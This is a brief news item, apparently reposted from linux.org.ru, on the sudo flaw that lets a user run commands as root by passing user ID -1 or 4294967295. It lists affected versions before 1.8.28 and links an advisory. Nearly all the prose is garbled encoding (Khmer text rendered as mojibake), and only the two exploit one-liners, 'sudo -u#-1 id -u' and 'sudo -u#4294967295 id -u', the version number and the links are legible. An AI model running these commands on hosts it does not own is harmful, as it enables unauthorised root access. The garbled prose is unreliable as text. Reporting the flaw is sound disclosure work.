แž—แžถแž–แž„แžถแž™แžšแž„แž‚แŸ’แžšแŸ„แŸ‡แž“แŸ…แž€แŸ’แž“แžปแž„ sudo

แž€แŸ†แž แžปแžŸแž“แŸ…แž€แŸ’แž“แžปแž„ sudo แžขแž“แžปแž‰แŸ’แž‰แžถแžแžฑแŸ’แž™แžขแŸ’แž“แž€แž”แŸ’แžšแžแžทแž”แžแŸ’แžแžทแžฏแž€แžŸแžถแžšแžŠแŸ‚แž›แžขแžถแž…แž”แŸ’แžšแžแžทแž”แžแŸ’แžแžทแž”แžถแž“แžŽแžถแž˜แžฝแž™แž‡แžถ root แž”แŸ’แžšแžŸแžทแž“แž”แžพ /etc/sudoers แžขแž“แžปแž‰แŸ’แž‰แžถแžแžฑแŸ’แž™แžœแžถแžแŸ’แžšแžผแžœแž”แžถแž“แž”แŸ’แžšแžแžทแž”แžแŸ’แžแžทแžŠแŸ„แž™แžขแŸ’แž“แž€แž”แŸ’แžšแžพแž”แŸ’แžšแžถแžŸแŸ‹แž•แŸ’แžŸแŸแž„แž‘แŸ€แž แž แžพแž™แžแŸ’แžšแžผแžœแž”แžถแž“แž แžถแž˜แžƒแžถแžแŸ‹แžŸแž˜แŸ’แžšแžถแž”แŸ‹แž€แžถแžš root แŸ”

แž€แžถแžšแž€แŸแž„แž”แŸ’แžšแžœแŸแž‰แŸ’แž…แž“แŸƒแž€แŸ†แž แžปแžŸแž‚แžบแžŸแžถแž˜แž‰แŸ’แž‰แžŽแžถแžŸแŸ‹แŸ–

sudo -u#-1 id -u

แžฌแŸ–

sudo -u#4294967295 id -u

แž€แŸ†แž แžปแžŸแž˜แžถแž“แžœแžแŸ’แžแž˜แžถแž“แž“แŸ…แž€แŸ’แž“แžปแž„แž€แŸ†แžŽแŸ‚แž‘แžถแŸ†แž„แžขแžŸแŸ‹แž“แŸƒ sudo แž˜แžปแž“ 1.8.28

แž–แŸแžแŸŒแž˜แžถแž“แž›แž˜แŸ’แžขแžทแžแŸ–

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html


https://www.sudo.ws/alerts/minus_1_uid.html

แž”แŸ’แžšแž—แž–: linux.org.ru

แž”แž“แŸ’แžแŸ‚แž˜แž˜แžแžทแž™แŸ„แž”แž›แŸ‹